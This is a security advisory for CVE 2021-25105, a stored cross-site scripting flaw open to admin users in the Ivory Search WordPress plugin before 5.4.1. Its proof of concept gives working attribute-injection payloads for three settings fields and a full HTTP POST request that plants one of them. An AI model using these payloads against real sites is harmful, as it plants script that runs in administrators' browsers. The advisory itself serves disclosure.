Ivory Search < 5.4.1 – Multiple Admin+ Stored Cross-Site Scripting | CVE 2021-25105

Description

The plugin does not escape some of the Form settings, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.

Proof of Concept

Go to the AJAX settings of a Form and put the following payload in the "Minimum number of characters required to run ajax search." (min_no_for_search field) or "Text when there is no search results" (nothing_found_text field) settings: "style=animation-name:rotation onanimationstart=alert(/XSS/)// yo="

Note: The min_no_for_search field is only validated to be a number client side.


For the _is_settings[highlight_color] parameter, a payload such as  " autofocus=autofocus onfocus=alert(/XSS/)// oni=" can be used

POST /wp-admin/admin.php?page=ivory-search&post=14&tab=options HTTP/2
Cookie: [admin cookies]
Content-Type: application/x-www-form-urlencoded

_wpnonce=e29855f021&post_ID=14&is_locale=&action=save&tab=options&_is_settings%5Bposts_per_page%5D=10&_is_settings%5Bhighlight_terms%5D=1&_is_settings%5Bhighlight_color%5D=%23FFFFB%22+autofocus%3Dautofocus+onfocus%3Dalert%28/XSS/%29%2F%2F+oni%3D%22&_is_settings%5Bterm_rel%5D=OR&_is_settings%5Bfuzzy_match%5D=2&_is_settings%5Bsearch_engine%5D=index&_is_settings%5Bmove_sticky_posts%5D=1&_is_settings%5Bdemo%5D=1&_is_settings%5Bdisable%5D=1&_is_settings%5Bempty_search%5D=1&is_save=Save+Form

The XSS will be triggered when accessing the settings again